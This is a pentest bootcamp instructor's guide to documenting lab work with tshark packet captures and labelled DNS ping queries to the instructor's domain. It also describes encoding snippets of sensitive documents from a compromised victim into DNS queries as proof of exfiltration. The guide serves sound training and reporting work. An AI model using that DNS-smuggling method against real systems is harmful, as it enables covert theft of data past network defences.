Documentation for professionals packet

My initial thought on using my professional documentation technique in the classroom was: Students become professionals, set expectations high and they will be great. My second thought was it is too much work for students. You choose.

Most penetration testing documentation tools do not consider the forensic approach; I do.

When I present a report to my client: they are always encrypted, anonymized, and easy to back up with forensic data. Forensic is a fancy way of saying we do this work scientifically and somebody else can reproduce our results independent of our actions. All reports are a looping though each scope component. They sound like this: "We did this, the result was this, the proof is this, here is the level of risk to your organization."

How - overview

1. Start with capturing all packets from your computer.
2. Ensure capture is decrypted if possible.
3. Record / list steps taken from any victim when you pivot (unless this is a red-team operation- no time and detected).
4. Support recording by having independent log tool.

We use tshark (wireshark), ping, and AWS dns logs.

I ping my dns with a query that will fail. The query is documentation of the steps I take (in some cases proof of possible exfiltration).

Hopefully you will practice this in your labs with me.

You can ping DNS. It does not have to be an IP address. It can be a fully qualified domain name. That fully qualified domain name does not have to resolve. In this case it is better that it doesn't resolve because the failure is recorded as an entry in the log coming from a particular IP address.

When you compromise a victim and you have a shell on that victim; while you are there, send a ping to your DNS server to prove you were there. Further if the client is requesting you to find a sensitive document and you can prove it by taking a small snippet and passing it to the DNS log. All of the activity that initiated from your computer will be logged in wireshark, and if it is not you can initiate things that precede the action.

How details:

When you are building out your attacker workstation you only have to do this setup once (save your based image with these settings). When you are on a temporary lab machine you have to do it over and over again (good practice/ work out your process).

One step at a time:

• PING -c 1 db07.mod02.lab1.task1.step0.clickalab.com

We start with pinging the instructor with a properly formatted failing DNS query. These queries must be unique, valid, and understandable. Since students are doing the same labs, we might be doing them on different machine, we might not be having the official lab set up.

We need a good convention that works for all students.

Proper DNS query for A record with subdomains.

My syntax is the following: FLinitials##.Module##.lab#.task#.step##.clickalab.com I need your initials plus 2 digits that never change. Dean Bushmiller becomes db07 On the main page there is folder with all the lab overviews. https://github.com/deanbushmiller/CEH-bootcamp/tree/master/LAB-Overview-PDFs Each pdf is a module. Your first Module: 02 (do not use dashes or underscores) https://datatracker.ietf.org/doc/html/rfc3490

• db07.mod02.... Lab Activities single digit, Task are single digit
• db07.mod02.lab1.task1

STEPs: if you are doing an ECC lab those steps match my video. Some steps do not produce packets or are insignificant. You choose. But when you start lab you are at step 0

• db07.mod02.lab1.task1.step0.clickalab.com
• Above is my unique, valid, and understandable dns query that has no record, generates a packet, and will be logged.

As you march thru your labs change the digits (except your name##) I know it is you, I can see where it came from, and you can add more to the LEFT SIDE as long as it follows the RFC above.

Ping your FQDN with a packet count of 1, depending on your OS the switches will be different.

• up-arrow: As long as you keep your command prompt open you can use the up-arrow to retrieve the previous ping and change the numbers.

You could ping the instructor without capturing, thank you very much it's nice to see you too. But the whole point is for you to sharpen your skills and build a process for documentation of your activities. Wireshark or Tshark is the tool for documentation.

PACKET CAPTURE

• sudo -i

• tshark -i 1 -n -w db07.mod02.lab1.task1.pcapng

• (you will see the incrementation of packets captured) Look up the three switches above in my syntax in this document: https://www.wireshark.org/docs/man-pages/tshark.html

• File names match the labs.

Do lab packet stimulus to victim and pings to clickalab.com When you are done the lab CTRL-Z to stop capture You are stopping between tasks to get small files

You need to reset the permissions on all the file so you can webmail them off the box:

chmod 644 *.pcapng

You need to move them to a directory where you can connect to the webmail/browser

mv *.pcapng/home/attacker/Desktop/ (your directories may vary)

Send them to yourself or me. But you might want to see deeper into the capture- TLS makes all that data unreadable ...there is another

ENCRYPTION IS IN OUR WAY

This is more on your own for advanced students:

• https://support.f5.com/csp/article/K50557518
• or
• https://www.trickster.dev/post/decrypting-your-own-https-traffic-with-wireshark/